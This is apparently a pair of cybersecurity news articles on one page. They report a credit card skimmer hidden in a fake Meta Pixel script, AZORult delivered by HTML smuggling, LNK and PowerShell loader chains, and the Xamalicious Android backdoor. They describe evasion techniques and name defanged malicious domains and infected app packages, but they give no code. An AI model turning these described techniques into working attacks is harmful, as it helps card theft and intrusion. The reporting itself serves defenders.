Apr 12, 2024NewsroomWeb Security / WordPress

Cybersecurity researchers have discovered a credit card skimmer that’s concealed within a fake Meta Pixel tracker script in an attempt to evade detection.

Sucuri said that the malware is injected into websites through tools that allow for custom code, such as WordPress plugins like Simple Custom CSS and JS or the “Miscellaneous Scripts” section of the Magento admin panel.

“Custom script editors are popular with bad actors because they allow for external third party (and malicious) JavaScript and can easily pretend to be benign by leveraging naming conventions that match popular scripts like Google Analytics or libraries like JQuery,” security researcher Matt Morrow said.

The bogus Meta Pixel tracker script identified by the web security company contains similar elements as its legitimate counterpart, but a closer examination reveals the addition of JavaScript code that substitutes references to the domain “connect.facebook[.]net” with “b-connected[.]com.”

While the former is a genuine domain linked to the Pixel tracking functionality, the replacement domain is used to load an additional malicious script (“fbevents.js”) that monitors if a victim is on a checkout page, and if so, serves a fraudulent overlay to grab their credit card details.

It’s worth noting that “b-connected[.]com” is a legitimate e-commerce website that has been compromised at some point to host the skimmer code. What’s more, the information entered into the fake form is exfiltrated to another compromised site (“www.donjuguetes[.]es”).

To mitigate such risks, it’s recommended to keep the sites up-to-date, periodically review admin accounts to determine if all of them are valid, and update passwords on a frequent basis.

This is particularly important as threat actors are known to leverage weak passwords and flaws in WordPress plugins to gain elevated access to a target site and add rogue admin users, which are then used to perform various other activities, including adding additional plugins and backdoors.

“Because credit card stealers often wait for keywords such as ‘checkout’ or ‘onepage,’ they may not become visible until the checkout page has loaded,” Morrow said.

“Since most checkout pages are dynamically generated based on cookie data and other variables passed to the page, these scripts evade public scanners and the only way to identify the malware is to check the page source or watch network traffic. These scripts run silently in the background.”

The development comes as Sucuri also revealed that sites built with WordPress and Magento are the target of another malware called Magento Shoplift. Earlier variants of Magento Shoplift have been detected in the wild since September 2023.

The attack chain starts with injecting an obfuscated JavaScript snippet into a legitimate JavScript file that’s responsible for loading a second script from jqueurystatics[.]com via WebSocket Secure (WSS), which, in turn, is designed to facilitate credit card skimming and data theft while masquerading as a Google Analytics script.

“WordPress has become a massive player in e-commerce as well, thanks to the adoption of Woocommerce and other plugins that can easily turn a WordPress site into a fully-featured online store,” researcher Puja Srivastava said.

“This popularity also makes WordPress stores a prime target — and attackers are modifying their MageCart e-commerce malware to target a wider range of CMS platforms.”

Cybersecurity researchers have discovered a new malware campaign that leverages bogus Google Sites pages and HTML smuggling to distribute a commercial malware called AZORult in order to facilitate information theft.

“It uses an unorthodox HTML smuggling technique where the malicious payload is embedded in a separate JSON file hosted on an external website,” Netskope Threat Labs researcher Jan Michael Alcantara said in a report published last week.

The phishing campaign has not been attributed to a specific threat actor or group. The cybersecurity company described it as widespread in nature, carried out with an intent to collect sensitive data for selling them in underground forums.

AZORult, also called PuffStealer and Ruzalto, is an information stealer first detected around 2016. It’s typically distributed via phishing and malspam campaigns, trojanized installers for pirated software or media, and malvertising.

Once installed, it’s capable of gathering credentials, cookies, and history from web browsers, screenshots, documents matching a list of specific extensions (.TXT, .DOC, .XLS, .DOCX, .XLSX, .AXX, and .KDBX), and data from 137 cryptocurrency wallets. AXX files are encrypted files created by AxCrypt, while KDBX refers to a password database created by the KeePass password manager.

The latest attack activity involves the threat actor creating counterfeit Google Docs pages on Google Sites that subsequently utilize HTML smuggling to deliver the payload.

HTML smuggling is the name given to a stealthy technique in which legitimate HTML5 and JavaScript features are abused to assemble and launch the malware by “smuggling” an encoded malicious script.

Thus, when a visitor is tricked into opening the rogue page from a phishing email, the browser decodes the script and extracts the payload on the host device, effectively bypassing typical security controls such as email gateways that are known to only inspect for suspicious attachments.

The AZORult campaign takes this approach a notch higher by adding a CAPTCHA barrier, an approach that not only gives a veneer of legitimacy but also serves as an additional layer of protection against URL scanners.

The downloaded file is a shortcut file (.LNK) that masquerades as a PDF bank statement, launching which kicks off a series of actions to execute a series of intermediate batch and PowerShell scripts from an already compromised domain.

One of the PowerShell scripts (“agent3.ps1”) is designed to fetch the AZORult loader (“service.exe”), which, in turn, downloads and executes another PowerShell script (“sd2.ps1”) containing the stealer malware.

“It executes the fileless AZORult infostealer stealthily by using reflective code loading, bypassing disk-based detection and minimizing artifacts,” Michael Alcantara said. “It uses an AMSI bypass technique to evade being detected by a variety of host-based anti-malware products, including Windows Defender.”

“Unlike common smuggling files where the blob is already inside the HTML code, this campaign copies an encoded payload from a separate compromised site. Using legitimate domains like Google Sites can help trick the victim into believing the link is legitimate.”

The findings come as Cofense revealed the use of malicious SVG files by threat actors in recent campaigns to disseminate Agent Tesla and XWorm using an open-source program called AutoSmuggle that simplifies the process of crafting HTML or SVG smuggled files.

AutoSmuggle “takes a file such as an exe or an archive and ‘smuggles’ it into the SVG or HTML file so that when the SVG or HTML file is opened, the ‘smuggled’ file is delivered,” the company explained.

Phishing campaigns have also been observed employing shortcut files packed within archive files to propagate LokiBot, an information stealer analogous to AZORult with features to harvest data from web browsers and cryptocurrency wallets.

“The LNK file executes a PowerShell script to download and execute the LokiBot loader executable from a URL. LokiBot malware has been observed using image steganography, multi-layered packing and living-off-the-land (LotL) techniques in past campaigns,” SonicWall disclosed last week.

In another instance highlighted by Docguard, malicious shortcut files have been found to initiate a series of payload downloads and ultimately deploy AutoIt-based malware.

That’s not all. Users in the Latin American region are being targeted as part of an ongoing campaign in which the attackers impersonate Colombian government agencies to send booby-trapped emails with PDF documents that accuse the recipients of flouting traffic rules.

Present within the PDF file is a link that, upon click, results in the download of a ZIP archive containing a VBScript. When executed, the VBScript drops a PowerShell script responsible for fetching one of the remote access trojans like AsyncRAT, njRAT, and Remcos.

Dec 27, 2023NewsroomPrivacy / App Security

A new Android backdoor has been discovered with potent capabilities to carry out a range of malicious actions on infected devices.

Dubbed Xamalicious by the McAfee Mobile Research Team, the malware is so named for the fact that it’s developed using an open-source mobile app framework called Xamarin and abuses the operating system’s accessibility permissions to fulfill its objectives.

It’s also capable of gathering metadata about the compromised device and contacting a command-and-control (C2) server to fetch a second-stage payload, but only after determining if it fits the bill.

The second stage is “dynamically injected as an assembly DLL at runtime level to take full control of the device and potentially perform fraudulent actions such as clicking on ads, installing apps, among other actions financially motivated without user consent,” security researcher Fernando Ruiz said.

The cybersecurity firm said it identified 25 apps that come with this active threat, some of which were distributed on the official Google Play Store since mid-2020. The apps are estimated to have been installed at least 327,000 times.

A majority of the infections have been reported in Brazil, Argentina, the U.K., Australia, the U.S., Mexico, and other parts of Europe and the Americas. Some of the apps are listed below –

• Essential Horoscope for Android (com.anomenforyou.essentialhoroscope)
• 3D Skin Editor for PE Minecraft (com.littleray.skineditorforpeminecraft)
• Logo Maker Pro (com.vyblystudio.dotslinkpuzzles)
• Auto Click Repeater (com.autoclickrepeater.free)
• Count Easy Calorie Calculator (com.lakhinstudio.counteasycaloriecalculator)
• Sound Volume Extender (com.muranogames.easyworkoutsathome)
• LetterLink (com.regaliusgames.llinkgame)
• NUMEROLOGY: PERSONAL HOROSCOPE &NUMBER PREDICTIONS (com.Ushak.NPHOROSCOPENUMBER)
• Step Keeper: Easy Pedometer (com.browgames.stepkeepereasymeter)
• Track Your Sleep (com.shvetsStudio.trackYourSleep)
• Sound Volume Booster (com.devapps.soundvolumebooster)
• Astrological Navigator: Daily Horoscope & Tarot (com.Osinko.HoroscopeTaro)
• Universal Calculator (com.Potap64.universalcalculator)

Xamalicious, which typically masquerades as health, games, horoscope, and productivity apps, is the latest in a long list of malware families that abuse Android’s accessibility services, requesting users’ access to it upon installation to carry out its tasks.

“To evade analysis and detection, malware authors encrypted all communication and data transmitted between the C2 and the infected device, not only protected by HTTPS, it’s encrypted as a JSON Web Encryption (JWE) token using RSA-OAEP with a 128CBC-HS256 algorithm,” Ruiz noted.

Even more troublingly, the first-stage dropper contains functions to self-update the main Android package (APK) file, meaning it can be weaponized to act as spyware or banking trojan without any user interaction.

McAfee said it identified a link between Xamalicious and an ad-fraud app named Cash Magnet, which facilitates app download and automated clicker activity to illicitly earn revenue by clicking on ads.

“Android applications written in non-java code with frameworks such as Flutter, react native and Xamarin can provide an additional layer of obfuscation to malware authors that intentionally pick these tools to avoid detection and try to stay under the radar of security vendors and keep their presence on apps markets,” Ruiz said.

Android Phishing Campaign Targets India With Banker Malware

The disclosure comes as the cybersecurity company detailed a phishing campaign that employs social messaging apps like WhatsApp to distribute rogue APK files that impersonate legitimate banks such as the State Bank of India (SBI) and prompt the user to install them to complete a mandatory Know Your Customer (KYC) procedure.

Once installed, the app asks the user to grant it SMS-related permissions and redirects to a fake page that only captures the victim’s credentials but also their account, credit/debit card, and national identity information.

The harvested data, alongside the intercepted SMS messages, are forwarded to an actor-controlled server, thereby allowing the adversary to complete unauthorized transactions.

It’s worth noting that Microsoft last month warned of a similar campaign that utilizes WhatsApp and Telegram as distribution vectors to target Indian online banking users.

“India underscores the acute threat posed by this banking malware within the country’s digital landscape, with a few hits found elsewhere in the world, possibly from Indian SBI users living in other countries,” researchers Neil Tyagi and Ruiz said.